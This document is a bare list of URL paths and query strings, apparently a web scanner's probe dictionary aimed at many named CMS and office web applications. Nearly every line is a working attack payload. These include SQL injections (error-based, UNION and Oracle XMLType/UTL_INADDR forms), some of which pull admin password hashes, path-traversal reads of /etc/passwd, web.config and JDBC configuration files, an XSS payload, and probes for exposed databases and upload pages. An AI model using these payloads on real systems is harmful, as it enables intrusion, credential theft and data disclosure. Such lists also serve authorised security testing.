/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/nobom.php
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/admin/Admin_Config.asp
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/FileUpload
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/KS_Data/KesionCMS6.mdb
/KS_Data/KesionCMS7.mdb
/KS_Data/KesionCMS8.mdb
/KS_Data/KesionCMS9.mdb
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/Asearch.asp
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
/addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/search.aspx
/servlet/fileOpenforms?filename=/index.jsp
/application/gzhd/bgxz/download.jsp?filename=/index.jsp
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/guestbook.php
/common/help.php
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/wap/index.php?a=newslist
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/admin/uploadFile.action
/Adminiscentertrator/AdmIndex.asp
/Adminiscentertrator/AdmLinkInsert.asp
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/NewsList.asp
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
/bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/webissue.asp
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/nowwebissue.asp
/bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/prewebissue.asp
/epstar/servlet/RaqFileServer?action=save&fileName=test.txt
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
/body/Function/download.asp?filepath=../download.asp&filename=download
/news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
/install/step4.aspx
/admin/Role/Role_List.aspx
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/admin/operupload.asp
/member/findAddressById.json
/member/zoneNm.json
/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
/i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
/api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
/search.php
/opac/index.jsp?page=../web-inf/web.xml
/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/account.t?op=showAccountList
/oa_server/App_Pages/App_page/News_add.aspx
/truexxgk/app/YsqgkController/smallQuery?type=1
/truexxgk/app/YsqgkController/smallQuery?type=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/UploadHandler.ashx
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
/admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
/post.php?act=phpok&id=12
/weixin/index.php?m=index&c=index
/work_flow/formOptJSPUpload.jsp?flag=1
/work_flow/formStartJSPUpload.jsp?flag=1
/admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
/public/editor/tpsc1.jsp?flag=sc
/outImg?imgPath=c:/boot.ini
/outImg?imgPath=/etc/passwd
/gsgl.asp?stype=
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/piw/Member/UploadMemberAttach.jsp
/piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
/piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/cardload.jsp?filename=../etc/passwd&maininfo_id=-12
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
/OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
/answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
/member.php?act=updateinfo
/site56/LmsOrder/trackOrder.jspx
/house/ProcManage/WebHouse/HousePic.aspx
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/loginverify.asp
/newssearch.cfm
/mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
/news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/down.aspx?Url=../web.config
/showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
/install/install.php.lock?step=2
/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
/getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/web.config.file.aspx
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
/information/changeState.asp
/MessageList.asp?action=search
/bangong/GroupInforDo.asp
/bangong/ShortCutInforDo.asp
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
/ratercp.php?action=savepassword
/admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?action=constructionresults&todo=del
/admincp.php?action=declarepublish&todo=del
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=search&todo=site
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/include/upload.inc.php
/admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
/admincp.php?action=vote&todo=savevote
/admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
/admincp.php?action=/../teach/sitebook&id=1
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/index_communicate.php
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/DownLoad.aspx?mu=../&fn=web.config&newname=web.config
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
/WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
/pt/edu/stuTransfer.aspx
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
/news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
/allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/download2.aspx?fn=../web.config
/DownLoad.aspx?Accessory=../index.aspx
/mod/news/qianshoucount.php
/mod/card/quest.php?op=get_m
/mod/home/quest.php?op=get_group_list
/NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
/NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
